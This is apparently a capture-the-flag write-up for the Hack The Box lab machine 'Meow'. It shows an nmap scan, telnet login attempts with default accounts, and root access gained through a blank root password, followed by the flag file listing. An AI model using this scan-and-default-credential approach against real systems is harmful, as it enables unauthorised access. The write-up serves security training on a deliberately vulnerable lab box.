← Back to Writeups
March 30, 2026 htb

Meow

telnet misconfiguration default-credentials linux starting-point enumeration unauthenticated-access

Meow is the first Starting Point box on HTB, with a single telnet port exposed and no authentication on the root account. There’s no exploit chain here, just a misconfigured service waiting for someone to try the obvious credentials.

Enumeration

aero@aerobytes:~$ nmap -sT -sV {IP}
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-03-30 21:02 EDT
Nmap scan report for {IP}
Host is up (0.057s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

One open port — telnet on 23/tcp. That’s the only way in.

Foothold

Telnet was open, so we connected and got a login prompt.

aero@aerobytes:~$ telnet {IP}
Trying {IP}...
Connected to {IP}.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█

Meow login: admin
Password:

admin with a blank password failed. First guess, wrong account.

Tried root next.

Meow login: root

No password prompt. root had no password set and we were in.

Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
...
root@Meow:~#

Flags

root@Meow:~# ls -la
total 36
drwx------  5 root root 4096 Jun 18  2021 .
drwxr-xr-x 20 root root 4096 Jul  7  2021 ..
lrwxrwxrwx  1 root root    9 Jun  4  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3132 Oct  6  2020 .bashrc
drwx------  2 root root 4096 Apr 21  2021 .cache
-rw-r--r--  1 root root   33 Jun 17  2021 flag.txt
drwxr-xr-x  3 root root 4096 Apr 21  2021 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   75 Mar 26  2021 .selected_editor
drwxr-xr-x  3 root root 4096 Apr 21  2021 snap

root@Meow:~# cat flag.txt
{flag redacted}
  • root.txt: {flag redacted}

Takeaways

Meow is about recognizing an exposed, unauthenticated service and acting on it. The attack surface was a single port. The entry point was a missing password on the root account.

Trying admin first was the right instinct. It’s a common default, and it didn’t work, but root with no password is just as common on misconfigured systems. Both are worth trying before reaching for a wordlist.

Telnet sends credentials in cleartext. Even on a box that required a password, anything on the wire would be readable.